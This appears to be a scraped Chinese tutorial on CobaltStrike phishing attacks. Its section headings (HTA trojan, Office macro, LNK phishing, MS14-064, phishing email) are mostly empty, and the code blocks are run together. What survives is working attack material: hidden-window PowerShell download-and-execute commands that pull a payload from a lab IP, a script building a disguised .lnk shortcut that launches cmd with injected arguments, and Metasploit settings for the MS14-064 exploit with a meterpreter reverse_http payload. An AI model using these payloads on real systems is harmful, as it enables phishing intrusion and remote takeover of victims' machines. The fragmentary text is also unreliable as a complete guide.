CobaltStrike钓鱼攻击
HTA木马
简介
步骤








Office宏木马
简介
步骤






LINK钓鱼
简介
步骤



OLE远程代码执行(MS14-064)
简介
准备环境
主机
描述
步骤




钓鱼邮件
简介
步骤






最后更新于



























最后更新于
cmd /c calc.exepowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"cmd /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.47.134:80/a'))"# 从 "test.txt" 文件中获取内容,并将该内容存储在变量 $file 中
$file = Get-Content "test.txt"
# 创建一个 COM 对象,该对象对应于 Windows Script Host Shell,可以用来执行各种系统任务,例如创建快捷方式
$WshShell = New-Object -comObject WScript.Shell
# 使用 WSH Shell 的 `CreateShortcut` 方法创建一个快捷方式,该快捷方式的名称是 "test.lnk"
$Shortcut = $WshShell.CreateShortcut("test.lnk")
# 设置快捷方式的目标路径,也就是快捷方式所指向的程序。这里设置的是 cmd.exe,它是 Windows 的命令提示符
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
# 设置快捷方式的图标位置。这里设置的是 Shell32.dll 文件中的第 21 个图标
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
# 设置当启动目标程序时要传递给它的命令行参数。这里设置的是 "test.txt" 文件的内容
$Shortcut.Arguments = ''+ $file
# 保存对快捷方式的所有更改,创建了实际的 ".lnk" 文件
$Shortcut.Save()set srvhost 192.168.47.144 //设置msf服务器的ip
set srvport 8080 //设置恶意连接的访问端口
set payload windows/meterpreter/reverse_http //设置监听协议
set allowpowershellprompt true //使用powershell执行代码
set lhost 192.168.47.134 //设置监听服务器的ip
set lport 80 //设置监听服务器的端口
run //开始执行